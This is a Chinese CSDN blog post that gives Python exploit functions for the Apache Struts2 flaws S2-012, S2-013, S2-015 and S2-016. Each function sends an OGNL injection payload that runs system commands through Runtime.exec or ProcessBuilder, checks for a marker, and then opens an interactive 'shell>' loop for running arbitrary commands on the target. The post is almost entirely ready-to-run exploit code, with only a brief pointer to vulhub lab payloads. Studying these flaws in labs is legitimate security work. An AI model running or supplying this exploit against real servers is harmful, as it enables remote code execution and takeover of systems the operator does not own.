s2系列——s2-012,s2-013,s2-015,s2-016
struts系列漏洞不在复现,插入payload即可,更换想要执行的命令即可,相关payload在vulhub中的readme.md文档中可以获取到,由于逻辑都一样,利用脚本直接使用github的struts.py即可s2-012```go```go```go```pythondef s2012(url):try:proxy = '192.168.43.74:8080'# 本地代理proxies
·
struts系列漏洞不在复现,插入payload即可,更换想要执行的命令即可,相关payload在vulhub中的readme.md文档中可以获取到,由于逻辑都一样,利用脚本直接使用github的struts.py即可
s2-012
```go
```go
```go
```python
def s2012(url):
try:
proxy = '192.168.43.74:8080' # 本地代理
proxies = {
'http': 'http://' + proxy,
'https': 'https://' + proxy
}
url1 = "user.action"
cmd = 'echo 367568'
m = re.sub(' ', '","', str(cmd))
n = '"' + m + '"'
p = urllib.parse.quote(n)
a = "%25%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B" + p + "%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D"
b = urllib.parse.unquote(a)
data = {'name': b}
res = requests.post(url + url1, data=data)
if b'367568' in res.content:
print("----------存在S2-012----------")
while 1:
cmd = input("shell>")
if "exit" in cmd:
print("结束s2-012利用")
break
m = re.sub(' ', '","', str(cmd))
p = urllib.parse.quote(m)
a = "%25%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%22" + p + "%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D"
b = urllib.parse.unquote(a)
data = {'name': b}
# print(res.content)
try:
res = requests.post(url + url1, data=data, proxies=proxies)
c = re.findall(r"b'(.*?)\\n\\x00", str(res.content))
e = re.sub(r'\\n', '\n', c[0])
print(e)
except:
print("程序执行成功")
continue
# print(c)
else:
print("不存在S2-012")
except:
print("程序出现未知错误")
s2-013
```python
def s2013(url):
try:
url1 = "link.action"
a = "?a=%24{233%2a233}"
res = requests.get(url + url1 + a)
if b'54289' in res.content:
print('-----------存在s2-013-----------')
while 1:
cmd = input("shell>")
if "exit" in cmd:
print("结束s2-013利用")
break
a = "?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('" + cmd + "').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D"
try:
res = requests.get(url + url1 + a, timeout=2)
a = re.findall(r"b'dbapp=(.*?)\\n\\x00", str(res.content))
c = re.sub(r'\\n', '\n', a[0])
print(c)
except:
print("程序执行成功")
continue
else:
print('不存在s2-013')
except:
print("程序出现未知错误")
s2-015
def s2015(url):
try:
cmd = 'echo 367568'
m = "%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27" + cmd + "%27%29.getInputStream%28%29%29%2C%23q%7D.action"
n = "param.action?message=%25%7b%23%63%6f%6e%74%65%78%74%5b%27%78%77%6f%72%6b%2e%4d%65%74%68%6f%64%41%63%63%65%73%73%6f%72%2e%64%65%6e%79%4d%65%74%68%6f%64%45%78%65%63%75%74%69%6f%6e%27%5d%3d%66%61%6c%73%65%2c%23%6d%3d%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2e%67%65%74%43%6c%61%73%73%28%29%2e%67%65%74%44%65%63%6c%61%72%65%64%46%69%65%6c%64%28%27%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%27%29%2c%23%6d%2e%73%65%74%41%63%63%65%73%73%69%62%6c%65%28%74%72%75%65%29%2c%23%6d%2e%73%65%74%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2c%74%72%75%65%29%2c%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27" + cmd + "%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%2c%23%71%7d"
res1 = requests.get(url + m, timeout=2)
res2 = requests.get(url + n, timeout=2)
# print(res1.text)
if b'367568' in res1.content and b'echo' not in res1.content:
print('-----------存在s2-015-----------')
while 1:
cmd = input("shell>")
if "exit" in cmd:
print("结束s2-015利用")
break
a = "%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27" + cmd + "%27%29.getInputStream%28%29%29%2C%23q%7D.action"
res = requests.get(url + a, timeout=2)
# print(res.text)
b = re.findall(r"</b> /(.*?)%0A.jsp", str(res.content))
c = urllib.parse.unquote(b[0])
print(c)
elif 'fxxk' in res2.headers:
if '367568' in res2.headers['fxxk']:
print('-----------存在s2-015-----------')
while 1:
cmd = input("shell>")
if "exit" in cmd:
print("结束s2-015利用")
break
a = "param.action?message=%25%7b%23%63%6f%6e%74%65%78%74%5b%27%78%77%6f%72%6b%2e%4d%65%74%68%6f%64%41%63%63%65%73%73%6f%72%2e%64%65%6e%79%4d%65%74%68%6f%64%45%78%65%63%75%74%69%6f%6e%27%5d%3d%66%61%6c%73%65%2c%23%6d%3d%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2e%67%65%74%43%6c%61%73%73%28%29%2e%67%65%74%44%65%63%6c%61%72%65%64%46%69%65%6c%64%28%27%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%27%29%2c%23%6d%2e%73%65%74%41%63%63%65%73%73%69%62%6c%65%28%74%72%75%65%29%2c%23%6d%2e%73%65%74%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2c%74%72%75%65%29%2c%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27" + cmd + "%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%2c%23%71%7d"
res = requests.get(url + a, timeout=2)
print(res.headers['fxxk'])
else:
print('不存在s2-015')
else:
print('不存在s2-015')
except:
print("不存在S2-015")
s2-016
def s2016(url):
try:
cmd = 'echo 367568'
a = "index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%2C%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" + cmd + "%22%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read%28%23d%29%2C%23genxor%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2C%23genxor.println%28%23d%29%2C%23genxor.flush%28%29%2C%23genxor.close%28%29%7D%0A"
res = requests.get(url + a, timeout=2)
if b'367568' in res.content and b'echo' not in res.content:
print('-----------存在s2-016-----------')
while 1:
cmd = input("shell>")
if "exit" in cmd:
print("结束s2-016利用")
break
a = "index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%2C%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" + cmd + "%22%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read%28%23d%29%2C%23genxor%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2C%23genxor.println%28%23d%29%2C%23genxor.flush%28%29%2C%23genxor.close%28%29%7D%0A"
res = requests.get(url + a, timeout=2)
# print(res.content)
a = re.findall(r"b'(.*?)\\n\\x00", str(res.content))
b = re.sub(r'\\n', '\n', a[0])
print(b)
else:
print('不存在s2-016')
except:
print("不存在S2-016")
CSDN联合极客时间,共同打造面向开发者的精品内容学习社区,助力成长!
更多推荐
1
0- 0
已为社区贡献1条内容
所有评论(0)